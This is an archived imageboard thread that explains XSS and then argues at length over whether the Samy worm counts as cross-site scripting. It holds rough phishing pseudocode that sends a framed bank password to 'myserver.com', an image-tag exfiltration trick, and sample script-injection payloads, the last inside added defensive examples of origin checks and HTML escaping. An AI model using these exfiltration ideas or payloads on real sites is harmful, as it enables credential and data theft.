What are XSS attacks?
You are currently reading a thread in /r9k/ - ROBOT9001

Thread replies: 81
Thread images: 2
What are XSS attacks?
>>
>>25211229
From memory, browser vulnerabilities letting a request originating from one site receive private information (such as a cookie value) from another.

Going to check now how accurate I was.
>>
>>25211229
Pretty much tricking a site to run code that you want to. I remember back in the myspace days some guy added code to his profile that made you add him as a friend and added the code to your profile to make anyone else do the same.
>>
>>25211311
Samy's stunt was not XSS by the very term. '*Cross* Site Scripting'; it remained all within MySpace.
>>
>>25211348
It's still XSS.
>>
>>25211531
No.

I didn't remember about the proper term, but it is just an injection. HTML/JS (markup/script, really) injection.

In fact, okay, Samy's script *is* cross-site, strictly speaking, but only owing to MySpace's domain design decision. True XSS would be injection of a script that reads, for instance, local storage from site X, and XMLHTTPRequests it to my site in the query string.
>>
>>25211605
https://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss
>>
>>25211605
>XMLHTTPRequests it to my site in the query string

Or, if it's impossible, embeds an <img src='mysite?readsecretdata'>; whatever.
>>
>>25211618
That page literally just says 'yeah, the term is technically wrong'.
>>
>>25211648
Everyone calls it XSS so it's XSS don't be so literal m8.
>>
>>25211689
>Everyone calls it XSS so it's XSS

'Everyone is wrong so you should be wrong too.'

Go to the kitchen, get a knife, cut an artery, and bleed out.
>>
>>25211761
But they're not wrong.
XSS does not mean it must be between different sites.
If you have a problem go yell at whoever came up with the term.
>>
Could someone who knows about this shit post contact info?
>>
>>25211780
>XSS does not mean it must be between different sites.

'"Cross-Site Scripting" does not mean it must be cross different sites.'

Are you okay, anon?
>>
>>25211780
>If you have a problem go yell at whoever came up with the term.

Also. The creator is not wrong; they knew what they meant. Who's at fault is you, who popularizes the incorrect usage.
>>
>>25211815
You know the creator and what they meant?
The term XSS is used to refer to attacks that would include Samy.
If you disagree you are using a definition that most do not.
This isn't the first time the literal interpretation of a term disagrees with its use.
>>
>>25211880
>If you disagree you are using a definition that most do not.

Yes. Those people are wrong.

>This isn't the first time the literal interpretation of a term disagrees with its use.

Yes. All those definitions must be corrected.
>>
>>25211880
>>25211915
And even if correctness for correctness' sake weren't enough, which it *IS*, there'd be practical benefits: pedagogical (motivational) and linguistic (increasing morphemic awareness, as when I mentioned that 'patriarchy' should rather be 'andrarchy' (disregarding the merits of the notion at the moment)).

tl;dr you're very wrong.
>>
>>25211915
Well we're not going to accommodate your autism sorry.
>>
>>25211972
Maybe; but this doesn't mean that I should stop trying to convince you of >>25211958, of the fact that you're confusing newcomers to webdev/websec who must learn and adopt an inconsistency, and so on.
>>
>>25211986
I think it's more misleading to simply tell someone Samy is not XSS when most would call it XSS. Instead you could explain that the term is misleading.
>>
>>25212095
>Instead you could explain that the term is misleading.

And what do you think I did for the last dozen of posts?

When you mention that a term is wrong, explanation usually follows anyway; but without a mention, it never will.
>>
>>25212123
>And what do you think I did for the last dozen of posts?

(In fact in the very post in which I first denied, too.)
>>
Here's what you can do in very rough pseudocode

>make a site sitting at www.bankign.com that looks like this
<script = "myscript.js">
<iframe id="myframe">
</iframe>

>myscript.js looks like this:
document.myframe.source = "www.banking.com";
while(1) {
pass = document.myframe.PasswordField.text
send(pass, myserver.com)
}

See, you make a dummy website sitting at a misspelling of banking.com.
The dummy site contains a frame which takes up the whole page. You can load another entire website into a frame, so the dummy site loads in banking.com.
The javascript in the dummy site accesses the password field in the loaded in webpage and continually sends its contents to an attacker's server (myserver.com).

I found all this out when I first discovered javascript and thought I could make some cool overlay for the websites I browsed. As it turns out, on all browsers, you can only access elements loaded into a frame if the loading page and loaded page are on the same server. So my cool overlay site stored on my desktop couldn't fiddle with or access the buttons and text on wikipedia or whatever.
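
The restriction described in the post above is the browser's same-origin check, which compares scheme, host and port rather than the server. The sketch below is an added example, not part of the thread; it is simplified (no document.domain or sandboxing), the function names are hypothetical, and the URLs other than the post's two domains are constructed samples.

```javascript
// Added example: the origin comparison a browser applies before script in one
// page may read a document loaded in its frame. Simplified model.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Returns the (scheme, host, port) tuple, or null for schemes treated here as
// opaque origins (file:, data:, ...), which never match any other origin.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return { scheme: u.protocol, host: u.hostname, port: u.port || DEFAULT_PORTS[u.protocol] };
}

// Decides whether script in parentUrl may read the DOM of frameUrl, and why not.
function frameAccess(parentUrl, frameUrl) {
  const a = originOf(parentUrl);
  const b = originOf(frameUrl);
  if (a === null || b === null) return { allowed: false, reason: 'opaque origin' };
  for (const part of ['scheme', 'host', 'port']) {
    if (a[part] !== b[part]) return { allowed: false, reason: `${part} differs` };
  }
  return { allowed: true, reason: 'same origin' };
}

// Constructed cases: [framing page, framed page].
const CASES = [
  ['http://www.bankign.com/', 'http://www.banking.com/login'],                 // look-alike domain from the post
  ['file:///C:/Users/anon/Desktop/overlay.html', 'https://en.wikipedia.org/'], // overlay page kept on the desktop
  ['https://example.com/a', 'https://example.com:443/b'],                      // explicit default port
  ['http://example.com/', 'https://example.com/'],                             // same host, other scheme
  ['https://example.com/', 'https://example.com:8443/'],                       // same host, other port
];
for (const [parent, frame] of CASES) {
  const r = frameAccess(parent, frame);
  console.log(`${parent} -> ${frame}: ${r.allowed ? 'allowed' : 'blocked'} (${r.reason})`);
}
```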
>>
>>25212123
Only because I disagreed.
Originally you didn't which could be confusing if they see it called XSS everywhere else.
>>
>>25212250
>Only because I disagreed.

No, again, as I said in >>25211348, 'it remained all within MySpace'.

>>25212196
>while(1) send(pass, myserver.com)

Way to DoS your own server.

I suggest onSubmit.
>>
>>25212439
You didn't state or imply that the commonly accepted meaning of XSS is misleading, you made it sound like the previous anon was simply mistaken and that Samy is not called XSS.
>>
>>25212569
>You didn't state or imply that the commonly accepted meaning of XSS is misleading, you made it sound like the previous anon was simply mistaken and that Samy is not called XSS.

Literally the opposite. There was nothing in my post about the adoption or application of the term, while I *emphasized* 'cross', so to tell right from the start that the issue is between cross-site and same-site requests.

Just leave the thread.
>>
>>25212742
>that the issue is between cross-site and same-site requests.
But that's not the issue. It's with sites that allow js and malicious code to be injected by not sanitizing etc.
>>
>>25212790
I give up. You probably are a person who'd call synchronous JSON-returning requests 'AJAX', too.
>>
>>25212829
>synchronous JSON-returning requests
*synchronous JSON-returning requests in VBScript
>>
>>25212829
But your usage of XSS disagrees with the accepted usage, when you corrected the anon you acted as if your definition was THE definition.
>>
>>25212860
You're grasping at imaginary insults now.
>>
>>25212886
>>25212860
(And repeating yourself, too -- I disproved the 'you sounded as if you were talking about usage, not about meaning' back in >>25212742 already.)
>>
>>25212886
>>25212904
What are you talking about?
You said
>Samy's stunt was not XSS by the very term. '*Cross* Site Scripting'; it remained all within MySpace.
When most would call Samy XSS. If you look up Samy is described as XSS, just because you're anal over the term doesn't change that.
I didn't insult you. Also try writing your posts as one reply.
>>
>>25213011
I am exceptionally tolerant of trolls wasting my time, but I draw the line at the point when they repeat themselves.
>>
>>25213217
Can't admit your post was misleading?
>>
>>25213266
It really is sad, troll, that you can only hope to convince that you have a point those people who won't have bothered to read the thread.
>>
>>25213289
Are you serious dude?
When every thing calls Samy XSS except you maybe your the one who is wrong.
Telling someone that Samy is not XSS is misleading because using the accepted definition of XSS it is.
I guess you're autistic about anything like this since you apparently tried to convince people that patriarchy should be changed as well?
>>
>>25213315
>your

Get back to programming, anon. I'm pretty sure there are some exciptions waiting to be thrown and constructers to initialize.
>>
>>25213339
>one typo out of all the posts
Way to miss the point.
>Get back to programming, anon.
And what are you? Pro bono internet pedant?
>>
>>25213361
>Way to miss the point.

All fallacies of yours I have already addressed, some more than once.
>>
>>25213395
What fallacies?
Samy is an XSS attack, you corrected anon and implied it was not.
>>
>>25213395
Honestly I'm starting to think you're the troll here, did you start this thread just to prompt your pedantic reply?
>>
>>25213419
>>25213432
A webdev task for you, anon: write an imageboard bot that chats using the same sophistry as you. It's not that hard; it's basically Eliza-tier keyword reaction, 'what fallacies?' to /\bfallac/, 'can't admit you're wrong' to indicative third person clauses, 'you missed the point' randomly, and so on.
>>
>>25213475
Although I admit, your claim in >>25213315 that I mislead because I correct a widespread incorrect definition gets points for sheer nerve.
>>
>>25213475
I'll write one for you. When asked a question like "what fallacies?" it can dodge it and respond with something irrelevant, it will also randomly claim it was insulted or call the other person a troll.

>>25213499
Haha seriously what's the matter with my claim?
How is it not misleading? You said Samy is not XSS when Samy is classified as an XSS attack.
>Get back to programming, anon.
No you simply tried to use your pet definition, if security experts, companies, and others all use the other definition that disagrees with yours you are the one who is incorrect and it IS misleading.
>>
Web page or backed is shit.
Post field that escapes out of html and dumps your js in the source.
Insert js that grabs user data/spams site/whatever in window.onload
???
Profit
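
The failure sketched in the post above (a post field whose text breaks out of the HTML and lands in the page source), next to its fix, as an added example that is not part of the thread. The profile fields, function names and sample values are constructed for illustration.

```javascript
// Added example, not code from the thread. Names and sample values are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encodes text for HTML element content and quoted attribute values only;
// script, style and URL contexts need their own encoders.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: post-field values are concatenated straight into the page source.
function renderProfileUnsafe(profile) {
  return `<div class="profile" title="${profile.name}"><p>${profile.about}</p></div>`;
}

// Hardened: every user-controlled value is encoded at the point of output.
function renderProfileSafe(profile) {
  return `<div class="profile" title="${escapeHtml(profile.name)}">` +
         `<p>${escapeHtml(profile.about)}</p></div>`;
}

// Crude structural check for this demo (not an HTML parser): which elements
// the output opens, and which attributes its first tag carries.
function markupSummary(html) {
  const tags = [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g)]
    .map((m) => m[1].toLowerCase());
  const firstTag = (html.match(/<[a-zA-Z][^>]*>/) || [''])[0];
  const attrs = [...firstTag.matchAll(/([a-zA-Z-]+)="[^"]*"/g)]
    .map((m) => m[1].toLowerCase());
  return { tags, attrs };
}

// Constructed sample input: one value targets an attribute, one targets element content.
const SAMPLE = {
  name: 'anon" onmouseover="alert(1)',
  about: 'hello <script>alert(1)</script>',
};

for (const render of [renderProfileUnsafe, renderProfileSafe]) {
  const html = render(SAMPLE);
  const { tags, attrs } = markupSummary(html);
  console.log(`${render.name}: tags=[${tags}] attrs=[${attrs}]`);
  console.log(`  ${html}`);
}
```

The template itself only ever opens `div` and `p` with `class` and `title`; anything else in the summary came from user input.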
>>
>>25213552
>You said Samy is not XSS when Samy is classified as an XSS attack.

Yes.

Yes.

Finally, you understood something.
>>
>>25213629
That is why your post was misleading.
>>
>>25213572
>Web page or backed is shit.
>or backend

I can't quite imagine XSS outside HTTP/WWW, because it implies a system where units of different origins (domains) issue requests, which basically means a browser. Examples?

>js that grabs user data/spams site

Has to be the former for XSS, unless it spams *other* sites.

>>25213643
>implying your misuse of the term 'mislead' isn't even worse than your misuse of the term 'XSS'
>>
>>25213696
>I can't quite imagine XSS outside HTTP/WWW

(Though maybe it can be generalized to all communication, e.g. XSS is any time that something executes something without checking origin. Not sure. Sage.)
>>
>>25213696
>Has to be the former for XSS, unless it spams *other* sites.
Stop trying to force YOUR definition you autist.

>mislead
>cause (someone) to have a wrong idea or impression about someone or something.
"the government misled the public about the road's environmental impact"
How did I misuse it? You just did it again. When everyone else disagrees with you about what XSS means you're the one who is wrong anon.
>>
>>25213757
>Stop trying to force YOUR definition you autist.

>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
>people begin to use it to just mean request scripting
>side with the frigging original author
>'stop trying to force your definition!'

0/10.
>>
>>25213790
Of course, that explicitation is going to go to waste, because you're just going to keep spamming your 'no ur wrong'.
>>
>>25213790
>>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
Source? Or are you just making up a narrative to fit your definition?
Does the fact that it says Cross Site and yet can refer to things like Samy trigger you this bad?

>>25213809
Stop replying to your posts just use P.S.
>>
>>25213824
>>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
>Source? Or are you just making up a narrative to fit your definition?

Source that the author of the term 'double cheeseburger' had in mind a burger that is double and contains cheese?

1/10. I see improvement.
>>
>>25213855
So no source, just assumption? You act as if the one who coined the term is in anguish at how it's used now. I think that's only you.
If the technical community uses a technical term to mean one specific thing then that is what it means. No amount of hemming and hawing over the literal interpretation will change that.
>>
>>25213914
>a four-legged animal has seven motor appendages
>no it doesn't
>stop assuming things!

It gets better, it really does.
>>
>>25213933
If everybody and all the biologists called animals with seven appendages four-legged animals your comparison would make some sense. As it is now it doesn't and is just a shitty way to argue.

Are you autistic?
>>
>>25213973
>If everybody and all the biologists called animals with seven appendages four-legged animals your comparison would make some sense.

And if everybody saw that an 8 cm stick is longer than a 12 cm one, it really would be.

As for autism, you definitely do not have it. Only allists would be so thoroughly attached to appeal to authority/appeal to majority.
>>
>>25214004
>As for autism, you definitely do not have it.
So is that a yes? You are autistic?
> Only allists would be so thoroughly attached to appeal to authority/appeal to majority.
Or linguists.
>>
>>25214004
Of course, long past is the phase of the thread that I had a chance to elaborate on how, for instance, laxness of definitions is a short-term, narrow-sighted solution, teaching and leading people to think in crude keywords, rather than clarifying their thoughts exactly... 'wait, it is not *really* same site, is it'.
>>
>>25214054
>>As for autism, you definitely do not have it.
>So is that a yes?

If you are as logical as your reasoning is strict, then I can understand how you can find this 'reasoning' here valid, yes.
>>
>>25214078
>refusing to answer a simple question
okay dokey.

>>25214064
You obviously have some strong personal beliefs on taxonomy, I find it odd and humorous to be honest.
>>
>>25214054
>linguists

Being a linguist has nothing to do with accepting the majority's definitions. Linguists just study the kind of misdefinitions you partake in; they exhibit them no more themselves than they can be convinced, for instance, that 'grammar is about words' while in reality, a word is an insufficient concept in the face of various further distinctions, such as punctuation (in some scripts nonexistent), enclitics, root morphemes, lack of effective distinction between affixes and adpositions (e.g. pre-/postpositions), and so on, which make the term essentially useless (give me a linguist who talks about 'words') -- which is an equivalent of your crude insistence that 'XSS is about injection', dismissing and obscuring finer points.

>>25214100
That was not a question.
>>
>>25214229
Your insensitive that XSS is about cross site is just as dismissive and obscuring of finer points.
>That was not a question.
Yes it was.
>Are you autistic?
>So is that a yes? You are autistic?
Those are questions.
>>
>>25214229
>'XSS is about injection'

In other words, saying that is like saying 'rollbacks are about safety'.

>>25214270
>Your insensitive that XSS is about cross site is just as dismissive and obscuring of finer points.

I don't deny existence of other, necessary conditions for XSS, such as, well, there being a script -- I just point out that this one is necessary.

While you explicitly insist that a necessary condition, cross-site requests, isn't.

Back to 0/10.

>>25214270
No, those are insults in the interrogative.
>>
>>25214270
>Your insensitive that [...]

A trilemma!

Is your error a misspelling of 'you're', a misformation of 'insensitivity', or an omission of 'claim'?
>>
>>25214357
But why is cross-site requests a necessary condition? Only you think it is.
>No, those are insults in the interrogative.
It was a simple question, it's on you that you took it as an insult. I was merely curious.

>>25214385
It auto-corrected to insensitive instead of insistence.
>>
>>25214422
>But why is cross-site requests a necessary condition?

'Why do things' names have to correspond to those things?'

Deep, man.

>Only you think it is.

For the second time ITT, you said something true.
>>
>>25214489
>For the second time ITT, you said something true.

(Well, as a matter, you didn't -- there are hundreds of people who point out misdefinition of 'XSS' and I could have quoted any of them, but that would be appeal to majority, which is invalid. And you would ignore it anyway.)
>>
>>25214489
>'Why do things' names have to correspond to those things?'
Names correspond to the things we use them for. There is no de jure basis just de facto.

>>25214508
wow hundreds!
>>
>>25214540
>things aren't wrong because whatever we choose to do is right by virtue of having been chosen to do

>>25214540
In a post:
>only you think so
One post later:
>haha only hundreds of people think so? weak
>>
>>25214570
>>25214540
Still, I'm tired and I'd rather listen to music than witness this waste of a technology thread anymore.

Here's your space for your final implication that I'm wrong:
[...
...
...]
>>
>>25214570
>wrong
You have such a rigid idea of what things can possibly mean.

>>25214606
Have fun "correcting" people in the future.
>>
>>25214621
>You have such a rigid idea

Enjoy your fluffy, feminine programming in which terms are 'kinda sorta about' other things.
>>
>>25214637
>Enjoy your fluffy, feminine programming in which terms are 'kinda sorta about' other things.
>I'll just throw in some adjectives, that'll show him!
Programming has clear definitions obviously and XSS has a fairly clear definition it's just not the one you seem to have landed upon.
>>
>>25214660
>Programming has clear definitions
>>25214660
>XSS has a fairly clear definition

Uh, no. You seem to be under an arbitrary, source-less impression that a definition is about pointing out ('de-') the binary boundaries ('fines') of a word. This is a narrow-minded, rigid belief. In fact, a definition is not about that; that's just an etymological fallacy. If the majority agrees that a definition is ambiguous and cannot be pinpointed exactly, then this is true. There is no such thing as a 'clear definition' -- where are you getting such things? You are so inflexible.


Are you autistic?
>>
>>25214735
>>25214660
In short, stop looking up to words' etymologies for justification of your odd, one-man beliefs.
>>
>>25214735
You are the inflexible one who points out binary boundaries of a word. You insist that cross site is a requirement for XSS.
>If the majority agrees that a definition is ambiguous and cannot be pinpointed exactly, then this is true.
I thought you disliked appeals to the majority?
>Are you autistic?
No. See I answered the question without sidestepping.

>>25214755
>In short, stop looking up to words' etymologies for justification of your odd, one-man beliefs.
Haha what? You are the one with the one-man belief; far more people share my definition of XSS than yours.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.